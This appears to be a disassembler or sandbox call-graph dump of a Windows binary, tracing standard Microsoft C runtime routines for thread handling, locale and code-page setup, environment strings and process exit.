20739->20738 20762 f9f213 20739->20762 20741 f9e107 20741->20693 20743 f9e130 20742->20743 20744 f9e126 20742->20744 20743->20694 20745 f9e296 ___vcrt_uninitialize_ptd 6 API calls 20744->20745 20746 f9e12b 20745->20746 20747 f9f213 ___vcrt_uninitialize_locks DeleteCriticalSection 20746->20747 20747->20743 20751 f9f1e0 20748->20751 20750 f9f209 20753 f9f213 ___vcrt_uninitialize_locks DeleteCriticalSection 20750->20753 20751->20750 20752 f9e103 20751->20752 20766 f9f41c 20751->20766 20752->20741 20754 f9e263 20752->20754 20753->20752 20783 f9f32d 20754->20783 20759 f9e293 20759->20739 20761 f9e278 20761->20739 20763 f9f23d 20762->20763 20764 f9f21e 20762->20764 20763->20741 20765 f9f228 DeleteCriticalSection 20764->20765 20765->20763 20765->20765 20771 f9f242 20766->20771 20769 f9f454 InitializeCriticalSectionAndSpinCount 20770 f9f43f 20769->20770 20770->20751 20772 f9f25f 20771->20772 20775 f9f263 20771->20775 20772->20769 20772->20770 20773 f9f2cb GetProcAddress 20773->20772 20775->20772 20775->20773 20776 f9f2bc 20775->20776 20778 f9f2e2 LoadLibraryExW 20775->20778 20776->20773 20777 f9f2c4 FreeLibrary 20776->20777 20777->20773 20779 f9f2f9 GetLastError 20778->20779 20780 f9f329 20778->20780 20779->20780 20781 f9f304 ___vcrt_FlsFree 20779->20781 20780->20775 20781->20780 20782 f9f31a LoadLibraryExW 20781->20782 20782->20775 20784 f9f242 ___vcrt_FlsFree 5 API calls 20783->20784 20785 f9f347 20784->20785 20786 f9f360 TlsAlloc 20785->20786 20787 f9e26d 20785->20787 20787->20761 20788 f9f3de 20787->20788 20789 f9f242 ___vcrt_FlsFree 5 API calls 20788->20789 20790 f9f3f8 20789->20790 20791 f9f413 TlsSetValue 20790->20791 20792 f9e286 20790->20792 20791->20792 20792->20759 20793 f9e296 20792->20793 20794 f9e2a0 20793->20794 20796 f9e2a6 20793->20796 20797 f9f368 20794->20797 20796->20761 20798 f9f242 ___vcrt_FlsFree 5 API calls 20797->20798 20799 f9f382 20798->20799 20800 f9f39a TlsFree 20799->20800 20801 f9f38e 20799->20801 20800->20801 20801->20796 20803 fa647c 20802->20803 20806 fa6492 20802->20806 20803->20806 20808 fa649f 20803->20808 20805 fa6489 20805->20806 20825 fa660a 20805->20825 20806->20697 20809 fa64ab 20808->20809 20810 fa64a8 20808->20810 20833 fb014e 20809->20833 20810->20805 20815 fa64c8 20860 fa64f9 20815->20860 20816 fa64bc 20817 fa899f ___free_lconv_mon 14 API calls 20816->20817 20819 fa64c2 20817->20819 20819->20805 20821 fa899f ___free_lconv_mon 14 API calls 20822 fa64ec 20821->20822 20823 fa899f ___free_lconv_mon 14 API calls 20822->20823 20824 fa64f2 20823->20824 20824->20805 20826 fa667b 20825->20826 20829 fa6619 20825->20829 20826->20806 20827 faf09e WideCharToMultiByte _Fputc 20827->20829 20828 fa8942 __Getctype 14 API calls 20828->20829 20829->20826 20829->20827 20829->20828 20831 fa667f 20829->20831 20832 fa899f ___free_lconv_mon 14 API calls 20829->20832 20830 fa899f ___free_lconv_mon 14 API calls 20830->20826 20831->20830 20832->20829 20834 fa64b1 20833->20834 20835 fb0157 20833->20835 20839 fb0450 GetEnvironmentStringsW 20834->20839 20882 fa98e2 20835->20882 20840 fb0468 20839->20840 20841 fa64b6 20839->20841 20842 faf09e _Fputc WideCharToMultiByte 20840->20842 20841->20815 20841->20816 20843 fb0485 20842->20843 20844 fb049a 20843->20844 20845 fb048f FreeEnvironmentStringsW 20843->20845 20846 fa9b87 std::_Locinfo::_Locinfo_ctor 15 API calls 20844->20846 20845->20841 20847 fb04a1 20846->20847 20848 fb04ba 20847->20848 20849 fb04a9 20847->20849 20851 faf09e _Fputc WideCharToMultiByte 20848->20851 20850 fa899f ___free_lconv_mon 14 API calls 20849->20850 20852 fb04ae FreeEnvironmentStringsW 20850->20852 20853 fb04ca 20851->20853 20852->20841 20854 fb04d9 20853->20854 20855 fb04d1 20853->20855 20857 fa899f ___free_lconv_mon 14 API calls 20854->20857 20856 fa899f ___free_lconv_mon 14 API calls 20855->20856 20858 fb04d7 FreeEnvironmentStringsW 20856->20858 20857->20858 20858->20841 20861 fa650e 20860->20861 20862 fa8942 __Getctype 14 API calls 20861->20862 20863 fa6535 20862->20863 20864 fa653d 20863->20864 20876 fa6547 20863->20876 20865 fa899f ___free_lconv_mon 14 API calls 20864->20865 20866 fa64cf 20865->20866 20866->20821 20867 fa65a4 20868 fa899f ___free_lconv_mon 14 API calls 20867->20868 20868->20866 20869 fa8942 __Getctype 14 API calls 20869->20876 20870 fa65b3 21032 fa65db 20870->21032 20872 fa882b ___std_exception_copy 43 API calls 20872->20876 20874 fa899f ___free_lconv_mon 14 API calls 20877 fa65c0 20874->20877 20875 fa65ce 20879 fa2e4c __Getctype 11 API calls 20875->20879 20876->20867 20876->20869 20876->20870 20876->20872 20876->20875 20878 fa899f ___free_lconv_mon 14 API calls 20876->20878 20881 fa899f ___free_lconv_mon 14 API calls 20877->20881 20878->20876 20880 fa65da 20879->20880 20881->20866 20883 fa98ed 20882->20883 20884 fa98f3 20882->20884 20885 fa8ecb __Getctype 6 API calls 20883->20885 20886 fa8f0a __Getctype 6 API calls 20884->20886 20904 fa98f9 20884->20904 20885->20884 20887 fa990d 20886->20887 20890 fa8942 __Getctype 14 API calls 20887->20890 20887->20904 20888 fa2fe7 __purecall 43 API calls 20891 fa9977 20888->20891 20889 fa98fe 20907 faff59 20889->20907 20892 fa991d 20890->20892 20893 fa993a 20892->20893 20894 fa9925 20892->20894 20895 fa8f0a __Getctype 6 API calls 20893->20895 20896 fa8f0a __Getctype 6 API calls 20894->20896 20897 fa9946 20895->20897 20898 fa9931 20896->20898 20899 fa994a 20897->20899 20900 fa9959 20897->20900 20901 fa899f ___free_lconv_mon 14 API calls 20898->20901 20902 fa8f0a __Getctype 6 API calls 20899->20902 20903 fa9655 __Getctype 14 API calls 20900->20903 20901->20904 20902->20898 20905 fa9964 20903->20905 20904->20888 20904->20889 20906 fa899f ___free_lconv_mon 14 API calls 20905->20906 20906->20889 20908 fb00ae __strnicoll 43 API calls 20907->20908 20909 faff83 20908->20909 20930 fafcd9 20909->20930 20912 fa9b87 std::_Locinfo::_Locinfo_ctor 15 API calls 20913 faffad 20912->20913 20914 faffc3 20913->20914 20915 faffb5 20913->20915 20937 fb01a9 20914->20937 20916 fa899f ___free_lconv_mon 14 API calls 20915->20916 20918 faff9c 20916->20918 20918->20834 20920 fafffb 20921 fa2f1d __strnicoll 14 API calls 20920->20921 20923 fb0000 20921->20923 20922 fb0042 20926 fb008b 20922->20926 20948 fafbcb 20922->20948 20924 fa899f ___free_lconv_mon 14 API calls 20923->20924 20924->20918 20925 fb0016 20925->20922 20928 fa899f ___free_lconv_mon 14 API calls 20925->20928 20927 fa899f ___free_lconv_mon 14 API calls 20926->20927 20927->20918 20928->20922 20931 fa54e1 __strnicoll 43 API calls 20930->20931 20932 fafceb 20931->20932 20933 fafcfa GetOEMCP 20932->20933 20934 fafd0c 20932->20934 20935 fafd23 20933->20935 20934->20935 20936 fafd11 GetACP 20934->20936 20935->20912 20935->20918 20936->20935 20938 fafcd9 45 API calls 20937->20938 20939 fb01c9 20938->20939 20941 fb0206 IsValidCodePage 20939->20941 20946 fb0242 codecvt 20939->20946 20940 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20942 fafff0 20940->20942 20943 fb0218 20941->20943 20941->20946 20942->20920 20942->20925 20944 fb0247 GetCPInfo 20943->20944 20947 fb0221 codecvt 20943->20947 20944->20946 20944->20947 20946->20940 20946->20946 20956 fafdad 20947->20956 20949 fafbd7 ___scrt_is_nonwritable_in_current_image 20948->20949 21006 fa2f71 EnterCriticalSection 20949->21006 20951 fafbe1 21007 fafc18 20951->21007 20957 fafdd5 GetCPInfo 20956->20957 20958 fafe9e 20956->20958 20957->20958 20964 fafded 20957->20964 20959 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20958->20959 20961 faff57 20959->20961 20960 faeb99 std::_Locinfo::_Locinfo_ctor 46 API calls 20962 fafe55 20960->20962 20961->20946 20967 faee90 20962->20967 20964->20960 20966 faee90 47 API calls 20966->20958 20968 fa54e1 __strnicoll 43 API calls 20967->20968 20969 faeea3 20968->20969 20972 faeca2 20969->20972 20973 faecbd 20972->20973 20974 faf022 __fread_nolock MultiByteToWideChar 20973->20974 20976 faed03 20974->20976 20975 faee7b 20977 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 20975->20977 20976->20975 20979 fa9b87 std::_Locinfo::_Locinfo_ctor 15 API calls 20976->20979 20981 faed29 __alloca_probe_16 20976->20981 20988 faedaf 20976->20988 20978 faee8e 20977->20978 20978->20966 20979->20981 20980 f9acdd __freea 14 API calls 20980->20975 20982 faf022 __fread_nolock MultiByteToWideChar 20981->20982 20981->20988 20983 faed6e 20982->20983 20983->20988 21000 fa9089 20983->21000 20986 faedd8 20989 faee63 20986->20989 20990 fa9b87 std::_Locinfo::_Locinfo_ctor 15 API calls 20986->20990 20993 faedea __alloca_probe_16 20986->20993 20987 faeda0 20987->20988 20992 fa9089 std::_Locinfo::_Locinfo_ctor 6 API calls 20987->20992 20988->20980 20991 f9acdd __freea 14 API calls 20989->20991 20990->20993 20991->20988 20992->20988 20993->20989 20994 fa9089 std::_Locinfo::_Locinfo_ctor 6 API calls 20993->20994 20995 faee2d 20994->20995 20995->20989 20996 faf09e _Fputc WideCharToMultiByte 20995->20996 20997 faee47 20996->20997 20997->20989 20998 faee50 20997->20998 20999 f9acdd __freea 14 API calls 20998->20999 20999->20988 21001 fa8b7b std::_Locinfo::_Locinfo_ctor 5 API calls 21000->21001 21002 fa9094 21001->21002 21003 fa90e6 std::_Locinfo::_Locinfo_ctor 5 API calls 21002->21003 21004 fa909a 21002->21004 21005 fa90da LCMapStringW 21003->21005 21004->20986 21004->20987 21004->20988 21005->21004 21006->20951 21017 fa3ac5 21007->21017 21009 fafc3a 21010 fa3ac5 __fread_nolock 43 API calls 21009->21010 21011 fafc59 21010->21011 21012 fafbee 21011->21012 21013 fa899f ___free_lconv_mon 14 API calls 21011->21013 21014 fafc0c 21012->21014 21013->21012 21031 fa2fb9 LeaveCriticalSection 21014->21031 21016 fafbfa 21016->20926 21018 fa3ad6 21017->21018 21022 fa3ad2 _Yarn 21017->21022 21019 fa3add 21018->21019 21023 fa3af0 codecvt 21018->21023 21020 fa2f1d __strnicoll 14 API calls 21019->21020 21021 fa3ae2 21020->21021 21024 fa2e1f __strnicoll 43 API calls 21021->21024 21022->21009 21023->21022 21025 fa3b1e 21023->21025 21026 fa3b27 21023->21026 21024->21022 21027 fa2f1d __strnicoll 14 API calls 21025->21027 21026->21022 21029 fa2f1d __strnicoll 14 API calls 21026->21029 21028 fa3b23 21027->21028 21030 fa2e1f __strnicoll 43 API calls 21028->21030 21029->21028 21030->21022 21031->21016 21033 fa65e8 21032->21033 21034 fa65b9 21032->21034 21035 fa65ff 21033->21035 21037 fa899f ___free_lconv_mon 14 API calls 21033->21037 21034->20874 21036 fa899f ___free_lconv_mon 14 API calls 21035->21036 21036->21034 21037->21033 21039 f91210 74 API calls 21038->21039 21040 fb9c94 21039->21040 21041 f9afd6 codecvt 3 API calls 21040->21041 21042 fb9c9b 21041->21042 21043 f9afd6 codecvt 3 API calls 21042->21043 21044 fb9ca4 21043->21044 21076 f9f7dc 21044->21076 21046 fb9cbf 21047 fb9cc8 21046->21047 21048 fb9d03 21046->21048 21050 fb9ccd GetCurrentThreadId 21047->21050 21051 fb9d10 21047->21051 21097 f979d4 21048->21097 21053 fb9d17 21050->21053 21054 fb9cd6 21050->21054 21052 f979d4 std::_Throw_Cpp_error 49 API calls 21051->21052 21052->21053 21055 f979d4 std::_Throw_Cpp_error 49 API calls 21053->21055 21091 f9a7f2 WaitForSingleObjectEx 21054->21091 21057 fb9d1e 21055->21057 21059 f979d4 std::_Throw_Cpp_error 49 API calls 21057->21059 21062 fb9d25 21059->21062 21060 fb9ce9 21061 fb9cf2 messages 21060->21061 21060->21062 21061->20704 21103 fa215b 21062->21103 21073 f9121c 21072->21073 21196 fa2076 21073->21196 21077 f9f7e9 21076->21077 21078 f9f7fd 21076->21078 21079 fa2f1d __strnicoll 14 API calls 21077->21079 21109 f9f78c 21078->21109 21081 f9f7ee 21079->21081 21083 fa2e1f __strnicoll 43 API calls 21081->21083 21085 f9f7f9 21083->21085 21084 f9f812 CreateThread 21086 f9f83d 21084->21086 21087 f9f831 GetLastError 21084->21087 21134 f9f680 21084->21134 21085->21046 21123 f9f6fe 21086->21123 21118 fa2ec3 21087->21118 21092 f9a809 21091->21092 21093 f9a83b 21091->21093 21094 f9a810 GetExitCodeThread 21092->21094 21095 f9a826 CloseHandle 21092->21095 21093->21057 21093->21060 21094->21093 21096 f9a821 21094->21096 21095->21093 21096->21095 21098 f979ea std::_Throw_Cpp_error 21097->21098 21174 f978f4 21098->21174 21104 fa2167 ___scrt_is_nonwritable_in_current_image 21103->21104 21105 fa9827 __Getctype 43 API calls 21104->21105 21108 fa216c 21105->21108 21106 fa2fe7 __purecall 43 API calls 21107 fa2196 21106->21107 21108->21106 21110 fa8942 __Getctype 14 API calls 21109->21110 21111 f9f79d 21110->21111 21112 fa899f ___free_lconv_mon 14 API calls 21111->21112 21113 f9f7aa 21112->21113 21114 f9f7ce 21113->21114 21115 f9f7b1 GetModuleHandleExW 21113->21115 21116 f9f6fe 16 API calls 21114->21116 21115->21114 21117 f9f7d6 21116->21117 21117->21084 21117->21086 21131 fa2f0a 21118->21131 21120 fa2ece __dosmaperr 21121 fa2f1d __strnicoll 14 API calls 21120->21121 21122 fa2ee1 21121->21122 21122->21086 21124 f9f70a 21123->21124 21130 f9f72e 21123->21130 21125 f9f719 21124->21125 21126 f9f710 CloseHandle 21124->21126 21127 f9f728 21125->21127 21128 f9f71f FreeLibrary 21125->21128 21126->21125 21129 fa899f ___free_lconv_mon 14 API calls 21127->21129 21128->21127 21129->21130 21130->21046 21132 fa9978 __strnicoll 14 API calls 21131->21132 21133 fa2f0f 21132->21133 21133->21120 21135 f9f68c ___scrt_is_nonwritable_in_current_image 21134->21135 21136 f9f6a0 21135->21136 21137 f9f693 GetLastError ExitThread 21135->21137 21138 fa9827 __Getctype 43 API calls 21136->21138 21139 f9f6a5 21138->21139 21148 fa9b12 21139->21148 21143 f9f6bc 21156 f9f85f 21143->21156 21149 f9f6b0 21148->21149 21150 fa9b24 GetPEB 21148->21150 21149->21143 21153 fa9117 21149->21153 21150->21149 21151 fa9b37 21150->21151 21159 fa8d3d 21151->21159 21154 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 21153->21154 21155 fa9133 21154->21155 21155->21143 21162 f9f735 21156->21162 21160 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 21159->21160 21161 fa8d59 21160->21161 21161->21149 21163 fa9978 __strnicoll 14 API calls 21162->21163 21165 f9f740 21163->21165 21164 f9f782 ExitThread 21165->21164 21166 f9f759 21165->21166 21171 fa9152 21165->21171 21168 f9f76c 21166->21168 21169 f9f765 CloseHandle 21166->21169 21168->21164 21170 f9f778 FreeLibraryAndExitThread 21168->21170 21169->21168 21170->21164 21172 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 21171->21172 21173 fa916b 21172->21173 21173->21166 21175 f97900 __EH_prolog3_GS 21174->21175 21184 f927d0 21175->21184 21178 f914d0 std::_Throw_Cpp_error 49 API calls 21179 f97929 21178->21179 21188 f926d0 21179->21188 21181 f97931 21193 f9b29c 21181->21193 21185 f927f1 21184->21185 21185->21185 21186 f95560 std::ios_base::_Init 49 API calls 21185->21186 21187 f92803 21186->21187 21187->21178 21189 f926db 21188->21189 21190 f926f6 messages 21188->21190 21189->21190 21191 fa2e2f std::_Throw_Cpp_error 43 API calls 21189->21191 21190->21181 21192 f9271a 21191->21192 21194 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21193->21194 21195 f9b2a6 21194->21195 21195->21195 21197 fa208a _Fputc 21196->21197 21198 fa20ac 21197->21198 21200 fa20d3 21197->21200 21199 fa2da2 _Fputc 43 API calls 21198->21199 21201 fa20c7 21199->21201 21205 f9f8b6 21200->21205 21203 fa06a0 _Fputc 43 API calls 21201->21203 21204 f91237 21203->21204 21204->20706 21206 f9f8c2 ___scrt_is_nonwritable_in_current_image 21205->21206 21213 f9f658 EnterCriticalSection 21206->21213 21208 f9f8d0 21214 fa071a 21208->21214 21213->21208 21228 faab60 21214->21228 21216 fa0741 21235 fa0a14 21216->21235 21223 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21224 f9f8dd 21223->21224 21225 f9f905 21224->21225 21598 f9f66c LeaveCriticalSection 21225->21598 21227 f9f8ee 21227->21201 21257 faab25 21228->21257 21230 faab71 21231 fa9b87 std::_Locinfo::_Locinfo_ctor 15 API calls 21230->21231 21232 faabd4 21230->21232 21233 faabcb 21231->21233 21232->21216 21234 fa899f ___free_lconv_mon 14 API calls 21233->21234 21234->21232 21279 fa1df6 21235->21279 21238 fa0a3d 21239 fa2da2 _Fputc 43 API calls 21238->21239 21240 fa0788 21239->21240 21250 fa06dc 21240->21250 21243 fa1d80 _Fputc 43 API calls 21245 fa0a68 std::_Locinfo::_Locinfo_ctor 21243->21245 21245->21240 21245->21243 21246 fa0c45 21245->21246 21285 fa099c 21245->21285 21288 fa0fa0 21245->21288 21322 fa125c 21245->21322 21247 fa2da2 _Fputc 43 API calls 21246->21247 21248 fa0c61 21247->21248 21249 fa2da2 _Fputc 43 API calls 21248->21249 21249->21240 21251 fa899f ___free_lconv_mon 14 API calls 21250->21251 21252 fa06ec 21251->21252 21253 faac0c 21252->21253 21254 fa07a2 21253->21254 21255 faac17 21253->21255 21254->21223 21255->21254 21500 fa33bd 21255->21500 21259 faab31 21257->21259 21258 faab52 21258->21230 21259->21258 21263 faaae9 21259->21263 21261 faab4c 21270 fb4e15 21261->21270 21264 faab0a 21263->21264 21265 faaaf5 21263->21265 21264->21261 21266 fa2f1d __strnicoll 14 API calls 21265->21266 21267 faaafa 21266->21267 21268 fa2e1f __strnicoll 43 API calls 21267->21268 21269 faab05 21268->21269 21269->21261 21271 fb4e2f 21270->21271 21272 fb4e22 21270->21272 21275 fb4e3b 21271->21275 21276 fa2f1d __strnicoll 14 API calls 21271->21276 21273 fa2f1d __strnicoll 14 API calls 21272->21273 21274 fb4e27 21273->21274 21274->21258 21275->21258 21277 fb4e5c 21276->21277 21278 fa2e1f __strnicoll 43 API calls 21277->21278 21278->21274 21280 fa1e23 21279->21280 21281 fa1e01 21279->21281 21351 fa1e5f 21280->21351 21282 fa2da2 _Fputc 43 API calls 21281->21282 21284 fa0a2f 21282->21284 21284->21238 21284->21240 21284->21245 21359 f9fc1f 21285->21359 21287 fa09d7 21287->21245 21289 fa0fbe 21288->21289 21290 fa0fa7 21288->21290 21291 fa2da2 _Fputc 43 API calls 21289->21291 21305 fa0ffd 21289->21305 21292 fa1280 21290->21292 21293 fa12f1 21290->21293 21290->21305 21296 fa0ff2 21291->21296 21297 fa131e 21292->21297 21298 fa1286 21292->21298 21294 fa12f6 21293->21294 21295 fa1344 21293->21295 21299 fa1338 21294->21299 21300 fa12f8 21294->21300 21295->21297 21306 fa12c3 21295->21306 21321 fa12a8 21295->21321 21296->21245 21388 f9ffc9 21297->21388 21298->21306 21310 fa128c 21298->21310 21405 fa1ca0 21299->21405 21303 fa129a 21300->21303 21304 fa12fd 21300->21304 21320 fa12bc 21303->21320 21303->21321 21395 fa19e0 21303->21395 21304->21297 21309 fa1302 21304->21309 21305->21245 21306->21320 21369 fa0146 21306->21369 21308 fa12d8 21308->21320 21376 fa1b6a 21308->21376 21312 fa1315 21309->21312 21315 fa1307 21309->21315 21310->21303 21310->21308 21310->21321 21384 fa1bff 21312->21384 21314 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21317 fa15a2 21314->21317 21315->21320 21380 fa1c83 21315->21380 21317->21245 21320->21314 21321->21320 21408 faa7db 21321->21408 21323 fa1280 21322->21323 21324 fa12f1 21322->21324 21327 fa131e 21323->21327 21328 fa1286 21323->21328 21325 fa12f6 21324->21325 21326 fa1344 21324->21326 21329 fa1338 21325->21329 21330 fa12f8 21325->21330 21326->21327 21335 fa12c3 21326->21335 21350 fa12a8 21326->21350 21331 f9ffc9 44 API calls 21327->21331 21328->21335 21339 fa128c 21328->21339 21334 fa1ca0 44 API calls 21329->21334 21332 fa129a 21330->21332 21333 fa12fd 21330->21333 21331->21350 21336 fa19e0 46 API calls 21332->21336 21349 fa12bc 21332->21349 21332->21350 21333->21327 21337 fa1302 21333->21337 21334->21350 21342 fa0146 44 API calls 21335->21342 21335->21349 21336->21350 21340 fa1307 21337->21340 21341 fa1315 21337->21341 21338 fa12d8 21345 fa1b6a 45 API calls 21338->21345 21338->21349 21339->21332 21339->21338 21339->21350 21347 fa1c83 44 API calls 21340->21347 21340->21349 21344 fa1bff 43 API calls 21341->21344 21342->21350 21343 f9afc3 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 21346 fa15a2 21343->21346 21344->21350 21345->21350 21346->21245 21347->21350 21348 faa7db _Fputc 45 API calls 21348->21350 21349->21343 21350->21348 21350->21349 21352 fa1e73 21351->21352 21358 fa1edd 21351->21358 21353 faaae9 _Ungetc 43 API calls 21352->21353 21354 fa1e7a 21353->21354 21355 fa2f1d __strnicoll 14 API calls 21354->21355 21354->21358 21356 fa1ed2 21355->21356 21357 fa2e1f __strnicoll 43 API calls 21356->21357 21357->21358 21358->21284 21360 fa1ddb std::_Locinfo::_Locinfo_ctor 43 API calls 21359->21360 21361 f9fc31 21360->21361 21362 f9fc46 21361->21362 21365 f9fc79 21361->21365 21368 f9fc61 std::_Locinfo::_Locinfo_ctor 21361->21368 21363 fa2da2 _Fputc 43 API calls 21362->21363 21363->21368 21364 f9fd10 21366 fa1d27 43 API calls 21364->21366 21365->21364 21367 fa1d27 43 API calls 21365->21367 21366->21368 21367->21364 21368->21287 21370 fa015a 21369->21370 21371 fa017c 21370->21371 21373 fa01a3 21370->21373 21372 fa2da2 _Fputc 43 API calls 21371->21372 21375 fa0199 21372->21375 21373->21375 21418 f9fb3c 21373->21418 21375->21321 21378 fa1b85 21376->21378 21377 fa1bbc 21377->21321 21378->21377 21379 faa7db _Fputc 45 API calls 21378->21379 21379->21377 21381 fa1c8f 21380->21381 21432 f9fe4c 21381->21432 21383 fa1c9f 21383->21321 21386 fa1c14 21384->21386 21385 fa2da2 _Fputc 43 API calls 21387 fa1c35 21385->21387 21386->21385 21386->21387 21387->21321 21389 f9ffdd 21388->21389 21390 fa0026 21389->21390 21391 f9ffff 21389->21391 21393 f9fb3c 15 API calls 21390->21393 21394 fa001c 21390->21394 21392 fa2da2 _Fputc 43 API calls 21391->21392 21392->21394 21393->21394 21394->21321 21396 fa19fa 21395->21396 21397 f9fb3c 15 API calls 21396->21397 21398 fa1a3b 21397->21398 21439 faa65a 21398->21439 21401 fa1d80 _Fputc 43 API calls 21402 fa1ae9 21401->21402 21403 fa1d80 _Fputc 43 API calls 21402->21403 21404 fa1b1c 21402->21404 21403->21404 21404->21321 21404->21404 21406 fa0146 44 API calls 21405->21406 21407 fa1cb5 21406->21407 21407->21321 21409 faa7f0 21408->21409 21410 faa831 21409->21410 21412 fa1d80 _Fputc 43 API calls 21409->21412 21416 faa7f4 codecvt _Fputc 21409->21416 21417 faa81d codecvt 21409->21417 21413 faf09e _Fputc WideCharToMultiByte 21410->21413 21410->21416 21410->21417 21411 fa2da2 _Fputc 43 API calls 21411->21416 21412->21410 21414 faa8ec 21413->21414 21415 faa902 GetLastError 21414->21415 21414->21416 21415->21416 21415->21417 21416->21321 21417->21411 21417->21416 21419 f9fb63 21418->21419 21420 f9fb51 21418->21420 21419->21420 21421 fa9b87 std::_Locinfo::_Locinfo_ctor 15 API calls 21419->21421 21420->21375 21422 f9fb87 21421->21422 21423 f9fb9a 21422->21423 21424 f9fb8f 21422->21424 21429 fa06f6 21423->21429 21425 fa899f ___free_lconv_mon 14 API calls 21424->21425 21425->21420 21428 fa899f ___free_lconv_mon 14 API calls 21428->21420 21430 fa899f ___free_lconv_mon 14 API calls 21429->21430 21431 f9fba5 21430->21431 21431->21428 21433 f9fe60 21432->21433 21434 f9fe82 21433->21434 21436 f9fea9 21433->21436 21435 fa2da2 _Fputc 43 API calls 21434->21435 21438 f9fe9f 21435->21438 21437 f9fb3c 15 API calls 21436->21437 21436->21438 21437->21438 21438->21383 21440 faa68f 21439->21440 21441 faa66b 21439->21441 21440->21441 21443 faa6c2 21440->21443 21442 fa2da2 _Fputc 43 API calls 21441->21442 21455 fa1ac5 21442->21455 21444 faa72a 21443->21444 21445 faa6fb 21443->21445 21446 faa753 21444->21446 21447 faa758 21444->21447 21458 faa4fe 21445->21458 21449 faa7ba 21446->21449 21450 faa780 21446->21450 21466 fa9d96 21447->21466 21493 faa0c2 21449->21493 21452 faa7a0 21450->21452 21453 faa785 21450->21453 21486 faa2ab 21452->21486 21476 faa42f 21453->21476 21455->21401 21455->21402 21459 faa514 21458->21459 21460 faa51f 21458->21460 21459->21455 21461 fa882b ___std_exception_copy 43 API calls 21460->21461 21462 faa57a 21461->21462 21467 fa9da9 21466->21467 21468 fa9dda 21467->21468 21469 fa9db8 21467->21469 21494 fb36b5 45 API calls 21493->21494 21501 fa33fd 21500->21501 21502 fa33d6 21500->21502 21501->21254 21502->21501 21503 faaae9 _Ungetc 43 API calls 21502->21503 21504 fa33f2 21503->21504 21506 fac544 21504->21506 21507 fac550 ___scrt_is_nonwritable_in_current_image 21506->21507 21508 fac614 21507->21508 21510 fac5a5 21507->21510 21516 fac558 21507->21516 21509 fa2da2 _Fputc 43 API calls 21508->21509 21509->21516 21517 fb09c6 EnterCriticalSection 21510->21517 21512 fac5ab 21513 fac5c8 21512->21513 21518 fac64c 21512->21518 21544 fac60c 21513->21544 21516->21501 21517->21512 21519 fac671 21518->21519 21542 fac694 __fread_nolock 21518->21542 21520 fac675 21519->21520 21522 fac6d3 21519->21522 21521 fa2da2 _Fputc 43 API calls 21520->21521 21521->21542 21523 fac6ea 21522->21523 21547 fae1dd 21522->21547 21542->21513 21597 fb09e9 LeaveCriticalSection 21544->21597 21546 fac612 21546->21516 21597->21546 21598->21227 21600 fa68f0 21599->21600 21609 fa6901 21599->21609 21610 fa698b GetModuleHandleW 21600->21610 21604 fa693f 21604->20683 21617 fa678b 21609->21617 21611 fa68f5 21610->21611 21611->21609 21612 fa69f0 GetModuleHandleExW 21611->21612 21613 fa6a2f GetProcAddress 21612->21613 21614 fa6a43 21612->21614 21613->21614 21615 fa6a5f 21614->21615 21616 fa6a56 FreeLibrary 21614->21616 21615->21609 21616->21615 21618 fa6797 ___scrt_is_nonwritable_in_current_image 21617->21618 21632 fa2f71 EnterCriticalSection 21618->21632 21620 fa67a1 21633 fa67d8 21620->21633 21622 fa67ae 21637 fa67cc 21622->21637 21625 fa695a 21662 fa69ce 21625->21662 21628 fa6978 21630 fa69f0 _unexpected 3 API calls 21628->21630 21629 fa6968 GetCurrentProcess TerminateProcess 21629->21628 21631 fa6980 ExitProcess 21630->21631 21632->21620 21634 fa67e4 ___scrt_is_nonwritable_in_current_image 21633->21634 21636 fa684b _unexpected 21634->21636 21640 fa85f5 21634->21640 21636->21622 21661 fa2fb9 LeaveCriticalSection 21637->21661 21639 fa67ba 21639->21604 21639->21625 21641 fa8601 __EH_prolog3 21640->21641 21644 fa834d 21641->21644 21643 fa8628 codecvt 21643->21636 21645 fa8359 ___scrt_is_nonwritable_in_current_image 21644->21645 21652 fa2f71 EnterCriticalSection 21645->21652 21647 fa8367 21653 fa8505 21647->21653 21652->21647 21654 fa8374 21653->21654 21655 fa8524 21653->21655 21657 fa839c 21654->21657 21655->21654 21656 fa899f ___free_lconv_mon 14 API calls 21655->21656 21656->21654 21660 fa2fb9 LeaveCriticalSection 21657->21660 21659 fa8385 21659->21643 21660->21659 21661->21639 21667 fa9b56 GetPEB 21662->21667 21665 fa69d8 GetPEB 21666 fa6964 21665->21666 21666->21628 21666->21629 21668 fa69d3 21667->21668 21669 fa9b70 21667->21669 21668->21665 21668->21666 21671 fa8cfd 21669->21671 21672 fa8c7a std::_Locinfo::_Locinfo_ctor 5 API calls 21671->21672 21673 fa8d19 21672->21673 21673->21668 21675 fa87a7 21674->21675 21677 fa87b9 ___scrt_uninitialize_crt 21674->21677 21676 fa87b5 21675->21676 21679 fa348b 21675->21679 21676->20723 21677->20723 21682 fa3318 21679->21682 21685 fa320c 21682->21685 21686 fa3218 ___scrt_is_nonwritable_in_current_image 21685->21686 21693 fa2f71 EnterCriticalSection 21686->21693 21688 fa3222 ___scrt_uninitialize_crt 21689 fa328e 21688->21689 21694 fa3180 21688->21694 21702 fa32ac 21689->21702 21693->21688 21695 fa318c ___scrt_is_nonwritable_in_current_image 21694->21695 21705 f9f658 EnterCriticalSection 21695->21705 21697 fa31cf 21719 fa3200 21697->21719 21698 fa3196 ___scrt_uninitialize_crt 21698->21697 21706 fa3426 21698->21706 21764 fa2fb9 LeaveCriticalSection 21702->21764 21704 fa329a 21704->21676 21705->21698 21707 fa343b 